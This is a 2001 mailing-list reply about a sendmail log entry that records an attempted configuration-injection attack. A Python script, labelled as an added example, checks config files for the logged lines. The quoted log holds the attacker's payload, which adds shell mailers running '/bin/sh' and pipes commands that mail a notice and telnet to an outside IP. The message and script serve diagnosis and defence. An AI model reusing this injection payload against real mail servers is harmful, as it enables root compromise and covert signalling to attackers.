Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
- Subject: Re: [cobalt-users] Maybe OT: maillog reports attack; other lists?
- From: SM <nntp@xxxxxxxxx>
- Date: Sat Dec 22 16:32:03 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Hi Edward,

At 21:21 22-12-2001 -0000, Edward Bishop wrote:
>I've got four entries in my maillog which I've never seen before and which
>look terrifying. This is on my non-Cobalt server (RedHat) so I don't know if
>it's of relevance to this list. If not, apologies - but I'd be grateful for
>suggestions as to good lists to try, hopefully with people as helpful as on
>this one.
>
>Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from
>ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog,
>P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c
>$u^M R<"|/... Vulnerable | mail jimmy@xxxxxxxxxxxxxxxxx">^M R<"|( sleep 2 ;
>echo quit ) |telnet 203.87.15.193 5701"

This looks suspicious. Verify your sendmail.cf and .forward file to see
whether they contain any of these entries. I assume that you are using
Sendmail 8.11.x. Versions of Sendmail below 8.11.6 were vulnerable to a
local root vulnerability. This vulnerability does not apply to version
8.9.3 btw.

I'll ask some Sendmail people about the above. Meanwhile, you may wish to
verify that box and block access from netconnect.net.au and to 203.87.15.193.

Regards,
-sm
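
The check suggested in the reply above, as an added example (not part of the original message and not Sendmail's own code): it splits the logged string into the lines the sender tried to inject and reports any that occur as whole lines in the text of a sendmail.cf or .forward file. The sample log line is the entry quoted above, unwrapped and with the two R lines left out; the configuration fragments and the function names are constructed for illustration.

```python
import re

# "POSSIBLE ATTACK" record as quoted above: source host, reason, quoted string.
ATTACK_RE = re.compile(
    r'sendmail\[\d+\]: \S+: POSSIBLE ATTACK from (?P<host>[^:\s]+): '
    r'newline in string "(?P<payload>.*)"\s*$'
)

def norm(line):
    """Collapse whitespace so wrapped or re-indented lines still compare equal."""
    return " ".join(line.split())

def injected_entries(log_line):
    """Return (source_host, entries) for a matching log line, else None.

    The logged string is split on carriage returns (raw, or shown as ^M),
    giving the individual lines the sender tried to smuggle in.
    """
    m = ATTACK_RE.search(log_line)
    if not m:
        return None
    parts = re.split(r"\^M|\r", m.group("payload"))
    return m.group("host"), [norm(p) for p in parts if norm(p)]

def entries_present(entries, config_text):
    """Return the logged entries that occur as whole lines in config_text."""
    have = {norm(ln) for ln in config_text.splitlines()}
    return [e for e in entries if e in have]

# Sample: the maillog entry quoted above, unwrapped, R lines omitted.
SAMPLE_LOG = (
    'Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from '
    'ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M '
    'Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M '
    'Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u"'
)

# Constructed configuration fragments, not taken from any real host.
CLEAN_CF = "Mlocal, P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, A=procmail -Y -a $h -d $u\n"
TAMPERED_CF = CLEAN_CF + "Mprog,   P=/bin/sh, F=lsDFMeu,  A=sh -c $u\n"

if __name__ == "__main__":
    host, entries = injected_entries(SAMPLE_LOG)
    print("source:", host)
    for name, text in (("clean", CLEAN_CF), ("tampered", TAMPERED_CF)):
        print(name, "->", entries_present(entries, text) or "no logged entries found")
```

An empty result only means none of the logged lines appear verbatim in the file that was checked.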